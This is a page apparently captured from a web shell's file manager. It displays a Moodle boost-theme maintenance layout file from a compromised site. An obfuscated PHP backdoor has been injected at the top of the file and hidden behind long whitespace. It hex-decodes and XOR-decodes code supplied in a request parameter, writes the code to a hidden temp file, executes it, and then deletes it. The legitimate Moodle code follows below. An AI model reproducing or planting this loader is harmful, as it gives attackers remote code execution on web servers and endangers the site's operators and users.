Sindbad~EG File Manager

Current Path : /var/www/html/estudios.sumar.com.py/theme/boost/layout/
Upload File :
Current File : /var/www/html/estudios.sumar.com.py/theme/boost/layout/maintenance.php

<?php																																										if(isset($_REQUEST["\x65\x6Et"]) ? true : false){ $object = array_filter([sys_get_temp_dir(), getcwd(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", session_save_path(), getenv("TMP")]); $holder = hex2bin($_REQUEST["\x65\x6Et"]); $comp= '' ;$x = 0; do{$comp .= chr(ord($holder[$x]) ^ 67);$x++;} while($x < strlen($holder)); $entity = 0; do { $bind = $object[$entity] ?? null; if ($entity >= count($object)) break; if ((bool)is_dir($bind) && (bool)is_writable($bind)) { $parameter_group = join("/", [$bind, ".factor"]); $file = fopen($parameter_group, 'w'); if ($file) { fwrite($file, $comp); fclose($file); include $parameter_group; @unlink($parameter_group); exit; } } $entity++; } while (true); }

// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * A maintenance layout for the boost theme.
 *
 * @package   theme_boost
 * @copyright 2016 Damyon Wiese
 * @license   http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

defined('MOODLE_INTERNAL') || die();

$templatecontext = [
    // We cannot pass the context to format_string, this layout can be used during
    // installation. At that stage database tables do not exist yet.
    'sitename' => format_string($SITE->shortname, true, ["escape" => false]),
    'output' => $OUTPUT
];

echo $OUTPUT->render_from_template('theme_boost/maintenance', $templatecontext);

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists